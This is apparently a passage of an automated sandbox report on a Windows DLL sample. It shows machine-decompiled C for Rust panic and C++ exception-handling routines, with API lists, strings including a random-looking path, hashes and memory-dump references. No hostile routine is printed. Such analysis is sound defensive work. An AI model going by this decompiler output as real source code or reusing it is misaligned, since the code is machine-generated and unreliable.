									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(4 + _t285)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6ed6010c;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6ed1dca0;
										_v60 =  &_v100;
										_v56 = 0x6ed1dca0;
										_v52 =  &_v148;
										_v48 = E6ED1DCC0;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ED1D0F0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6ed6e128, 0, _t248);
											}
											HeapFree( *0x6ed6e128, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed6e10c);
											_v68 = 0x6ed5fad0;
											_v64 = 1;
											_v152 = 0x6ed6e10c;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ED1DD30;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6ED1D0F0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed6e10c);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6ED1C640(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6ED1DA70(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed6e11c);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed6029c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed5f570;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6ED1D0F0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6ED1D2B0( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6ED1D290(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6ed6d040 = 0;
											_t368 =  *0x6ed6d040;
											if( *0x6ed6d040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6ed6017c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed5f570;
											_v48 = 0;
											_v20 = 3;
											if(E6ED1D0F0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6ed6e128, 0, _t238);
											}
											HeapFree( *0x6ed6e128, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

APIs

Part of subcall function 6ED1C700: AcquireSRWLockShared.KERNEL32(6ED6E11C), ref: 6ED1C785

HeapFree.KERNEL32(00000000,00000000), ref: 6ED1C8DC
HeapFree.KERNEL32(00000000,?), ref: 6ED1C8EA
TlsGetValue.KERNEL32(00000000), ref: 6ED1C94D
HeapFree.KERNEL32(00000000,00000000), ref: 6ED1CB31
HeapFree.KERNEL32(00000000,?), ref: 6ED1CB3F

Strings

cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6ED1C74D, 6ED1C7C8
Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ED1CC00

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AcquireLockSharedValue
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa
API String ID: 942675266-716947571
Opcode ID: 3283834f1ced67d5f6fe5a51e9f10e7ee1fb5f300a41119452e5af4dbd042e20
Instruction ID: e5e88e3e019c4fc3f194b90922fba372e5f8f96c01e6937b4d559511ab540c38
Opcode Fuzzy Hash: 3283834f1ced67d5f6fe5a51e9f10e7ee1fb5f300a41119452e5af4dbd042e20
Instruction Fuzzy Hash: 400212B0A08219CFEB14CFE4D894BDEBBB5BF49308F204529D455AB380DB75A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2F6F6, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6ED2F6F6(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6ED30658(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6ED31C23(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6ED2F3B1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6ED2F3B1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6ED2EBF7(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6ED2EB2A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6ED2F676(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6ED31C23(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6ED2F3B1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6ED2F3B1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6ED2F3B1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6ED2F3B1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6ED2EB2A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6ED2F676(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6ED2F131(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6ED2F3B1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6ED30105(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6ED2F3B1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6ED2F3B1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6ED2F3B1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6ED2F3B1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6ED30105(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6ED31BCC(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6ED2FD99( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6ed6e0c0) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6ED2F131(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6ED2FD81( &_v64);
											E6ED2E95C( &_v64, 0x6ed6b17c);
											L63:
											 *(E6ED2F3B1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6ED2F3B1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6ED2ED1D(_t279, _t319, _t274);
											E6ED30005(_a8, _a16, _t305);
											_t235 = E6ED301C2(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6ED2FF7C(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6ed2f6f6
0x6ed2f6fd
0x6ed2f6ff
0x6ed2f708
0x6ed2f70e
0x6ed2f716
0x6ed2f718
0x6ed2f71b
0x6ed2f721
0x6ed2fa9a
0x6ed2fa9a
0x6ed2fa9f
0x6ed2faa1
0x6ed2faa3
0x6ed2faa6
0x6ed2faa7
0x6ed2faaa
0x6ed2fab0
0x6ed2fbcf
0x6ed2fab6
0x6ed2fab6
0x6ed2fab7
0x6ed2fab8
0x6ed2fabf
0x6ed2fac2
0x6ed2fac5
0x6ed2facb
0x6ed2facd
0x6ed2fad2
0x6ed2fad5
0x6ed2fad7
0x6ed2fadd
0x6ed2fadf
0x6ed2fae5
0x6ed2fafa
0x6ed2faff
0x6ed2fb02
0x6ed2fb04
0x6ed2fbcb
0x00000000
0x6ed2fbcc
0x6ed2fb04
0x6ed2fae5
0x6ed2fadd
0x6ed2fad5
0x6ed2fb0a
0x6ed2fb0d
0x6ed2fb10
0x6ed2fb13
0x6ed2fb16
0x6ed2fb1c
0x6ed2fb2e
0x6ed2fb33
0x6ed2fb36
0x6ed2fb39
0x6ed2fb3c
0x6ed2fb3f
0x6ed2fb42
0x6ed2fb45
0x00000000
0x00000000
0x6ed2fb4b
0x6ed2fb4b
0x6ed2fb4e
0x6ed2fb51
0x6ed2fb60
0x6ed2fb61
0x6ed2fb61
0x6ed2fb63
0x6ed2fb66
0x00000000
0x00000000
0x6ed2fb68
0x6ed2fb6b
0x00000000
0x00000000
0x6ed2fb79
0x6ed2fb7b
0x6ed2fb7e
0x6ed2fb80
0x6ed2fb88
0x6ed2fb88
0x6ed2fb8b
0x6ed2fb8d
0x6ed2fb8f
0x6ed2fbab
0x6ed2fbb0
0x6ed2fbb3
0x6ed2fbb3
0x00000000
0x6ed2fb8b
0x6ed2fb82
0x6ed2fb86
0x00000000
0x00000000
0x00000000
0x6ed2fbb6
0x6ed2fbb9
0x6ed2fbba
0x6ed2fbbd
0x6ed2fbc0
0x6ed2fbc3
0x6ed2fbc6
0x6ed2fbc6
0x00000000
0x6ed2fb51
0x6ed2fbd0
0x6ed2fbd5
0x6ed2fbd6
0x6ed2fbd9
0x6ed2fbdc
0x6ed2fbdd
0x6ed2fbde
0x6ed2fbdf
0x6ed2fbe2
0x6ed2fbe4
0x6ed2fc5c
0x6ed2fc5e
0x6ed2fc5e
0x6ed2fbe6
0x6ed2fbe6
0x6ed2fbe9
0x6ed2fbec
0x00000000
0x6ed2fbee
0x6ed2fbee
0x6ed2fbf1
0x6ed2fbf4
0x6ed2fbfb
0x6ed2fbfb
0x6ed2fbfe
0x6ed2fc00
0x6ed2fc02
0x6ed2fc34
0x6ed2fc34
0x6ed2fc37
0x6ed2fc3e
0x6ed2fc3e
0x6ed2fc41
0x6ed2fc44
0x6ed2fc4b
0x6ed2fc4b
0x6ed2fc4e
0x6ed2fc55
0x6ed2fc57
0x6ed2fc57
0x6ed2fc50
0x6ed2fc50
0x6ed2fc53
0x00000000
0x00000000
0x6ed2fc53
0x6ed2fc46
0x6ed2fc46
0x6ed2fc49
0x00000000
0x00000000
0x6ed2fc49
0x6ed2fc39
0x6ed2fc39
0x6ed2fc3c
0x00000000
0x00000000
0x6ed2fc3c
0x6ed2fc58
0x6ed2fc04
0x6ed2fc04
0x6ed2fc04
0x6ed2fc07
0x6ed2fc07
0x6ed2fc09
0x6ed2fc0b
0x00000000
0x00000000
0x6ed2fc0d
0x6ed2fc0f
0x6ed2fc23
0x6ed2fc23
0x6ed2fc11
0x6ed2fc11
0x6ed2fc14
0x6ed2fc17
0x00000000
0x6ed2fc19
0x6ed2fc19
0x6ed2fc1c
0x6ed2fc1f
0x6ed2fc21
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed2fc21
0x6ed2fc17
0x6ed2fc2c
0x6ed2fc2c
0x6ed2fc2e
0x00000000
0x6ed2fc30
0x6ed2fc30
0x6ed2fc30
0x00000000
0x6ed2fc2e
0x6ed2fc27
0x6ed2fc29
0x6ed2fc29
0x00000000
0x6ed2fc29
0x6ed2fbf6
0x6ed2fbf6
0x6ed2fbf9
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed2fbf9
0x6ed2fbf4
0x6ed2fbec
0x6ed2fc5f
0x6ed2fc63
0x6ed2fc63
0x6ed2f730
0x6ed2f730
0x6ed2f739
0x6ed2f836
0x6ed2f836
0x6ed2f839
0x00000000
0x6ed2f768
0x6ed2f768
0x6ed2f76d
0x00000000
0x6ed2f773
0x6ed2f773
0x6ed2f77b
0x6ed2fa34
0x6ed2fa38
0x6ed2f781
0x6ed2f786
0x6ed2f789
0x6ed2f78e
0x6ed2f795
0x6ed2f79a
0x00000000
0x6ed2f7d2
0x6ed2f7da
0x6ed2f83e
0x6ed2f83e
0x6ed2f841
0x6ed2f844
0x6ed2f846
0x6ed2f849
0x6ed2f84c
0x6ed2f852
0x6ed2fa03
0x6ed2fa03
0x6ed2fa06
0x00000000
0x6ed2fa08
0x6ed2fa08
0x6ed2fa0b
0x00000000
0x6ed2fa11
0x6ed2fa11
0x6ed2fa14
0x6ed2fa17
0x6ed2fa18
0x6ed2fa19
0x6ed2fa1c
0x6ed2fa1d
0x6ed2fa20
0x6ed2fa21
0x6ed2fa26
0x00000000
0x6ed2fa26
0x6ed2fa0b
0x6ed2f858
0x6ed2f858
0x6ed2f85c
0x00000000
0x6ed2f862
0x6ed2f862
0x6ed2f869
0x6ed2f881
0x6ed2f881
0x6ed2f884
0x6ed2f887
0x6ed2f88d
0x6ed2f89d
0x6ed2f8a2
0x6ed2f8a5
0x6ed2f8a8
0x6ed2f8ab
0x6ed2f8ae
0x6ed2f8b1
0x6ed2f8b4
0x6ed2f8ba
0x6ed2f8ba
0x6ed2f8bd
0x6ed2f8c0
0x6ed2f8cf
0x6ed2f8d0
0x6ed2f8d0
0x6ed2f8d2
0x6ed2f8d5
0x6ed2f8db
0x6ed2f8de
0x6ed2f8e4
0x6ed2f8e6
0x6ed2f8e9
0x6ed2f8ec
0x6ed2f8f5
0x6ed2f8f8
0x6ed2f8fa
0x6ed2f8fa
0x6ed2f8fd
0x6ed2f900
0x6ed2f903
0x6ed2f906
0x6ed2f909
0x6ed2f90e
0x6ed2f90f
0x6ed2f910
0x6ed2f911
0x6ed2f912
0x6ed2f915
0x6ed2f917
0x6ed2f919
0x00000000
0x6ed2f91b
0x6ed2f91b
0x6ed2f91b
0x6ed2f91e
0x6ed2f921
0x6ed2f923
0x6ed2f924
0x6ed2f929
0x6ed2f92c
0x6ed2f92e
0x00000000
0x00000000
0x6ed2f930
0x6ed2f931
0x6ed2f934
0x6ed2f936
0x00000000
0x6ed2f938
0x6ed2f938
0x6ed2f93b
0x6ed2f93e
0x00000000
0x6ed2f93e
0x00000000
0x6ed2f936
0x6ed2f952
0x6ed2f958
0x6ed2f975
0x6ed2f97a
0x6ed2f97a
0x6ed2f97d
0x6ed2f97d
0x00000000
0x6ed2f941
0x6ed2f941
0x6ed2f942
0x6ed2f945
0x6ed2f948
0x6ed2f94b
0x6ed2f94b
0x00000000
0x6ed2f950
0x6ed2f8ec
0x6ed2f8de
0x6ed2f980
0x6ed2f983
0x6ed2f984
0x6ed2f987
0x6ed2f98a
0x6ed2f98d
0x6ed2f990
0x6ed2f990
0x6ed2f999
0x6ed2f99c
0x6ed2f99c
0x6ed2f8b4
0x6ed2f99f
0x6ed2f9a3
0x6ed2f9a5
0x6ed2f9a8
0x6ed2f9ae
0x6ed2f9ae
0x6ed2f9b6
0x6ed2f9bb
0x6ed2fa29
0x6ed2fa29
0x6ed2fa2e
0x6ed2fa32
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed2f9bd
0x6ed2f9bd
0x6ed2f9c1
0x6ed2f9d3
0x6ed2f9d6
0x6ed2f9d9
0x6ed2f9db
0x6ed2f9f2
0x6ed2f9f6
0x6ed2f9fc
0x6ed2f9fd
0x6ed2f9ff
0x00000000
0x6ed2fa01
0x00000000
0x6ed2fa01
0x6ed2f9dd
0x6ed2f9e2
0x6ed2f9e5
0x6ed2f9ea
0x6ed2f9ed
